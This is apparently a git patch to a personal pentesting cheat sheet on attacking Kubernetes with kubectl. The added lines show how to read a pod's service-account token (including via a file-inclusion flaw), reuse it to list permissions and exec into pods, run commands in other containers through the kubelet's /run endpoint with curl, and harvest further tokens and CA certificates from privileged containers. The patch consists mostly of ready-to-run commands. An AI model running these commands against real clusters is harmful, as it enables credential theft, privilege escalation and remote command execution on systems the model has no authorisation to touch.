From 7c0874c0f33a684f8357e4bc39c523f1784f1b41 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Tue, 6 Sep 2022 22:02:37 +0200
Subject: [PATCH] added enumeration with elevate token

---
 enumeration/docs/kubectl.md | 35 ++++++++++++++++++++++++++++++++++-
 1 file changed, 34 insertions(+), 1 deletion(-)

diff --git a/enumeration/docs/kubectl.md b/enumeration/docs/kubectl.md
index 1ccf8f3..6510779 100644
--- a/enumeration/docs/kubectl.md
+++ b/enumeration/docs/kubectl.md
@@ -21,7 +21,7 @@ kubectl get secret <secret> -o json
 kubectl describe secrets <secret> -o 'json'
 ```
 ## Abuse Token
-* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
+* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token` 
 * By change of an LFI extract the token and 
 ```sh
 kubectl auth can-i --list --token=$TOKEN
@@ -29,6 +29,37 @@ kubectl get pods  --token=$TOKEN
 kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
 ```
 
+* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__
+```
+TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+```
+
+### Elevate Permissions with found token
+
+* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
+```sh
+curl  -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
+``` 
+    * Find namespace and pods
+```sh
+kubectl get pods -A
+```
+    * Find name of container inside the pod description under `ContainerStatuses/name`
+```sh
+kubectl get pod $POD -n $NAMESPACE -o yaml
+```
+
+* Interesting find in any high priv container are 
+```sh
+/run/secrets/kubernetes.io/serviceaccount/token
+/run/secrets/kubernetes.io/serviceaccount/ca.crt
+```
+
+* Enumerate again with the new found token
+```sh
+kubectl auth can-i --list
+```
+
 ## Create Pods
 
 * Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
@@ -46,3 +77,5 @@ kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
 ```sh
 kubectl exec -it  <podname> -n <namespace> -- /bin/bash
 ```
+
+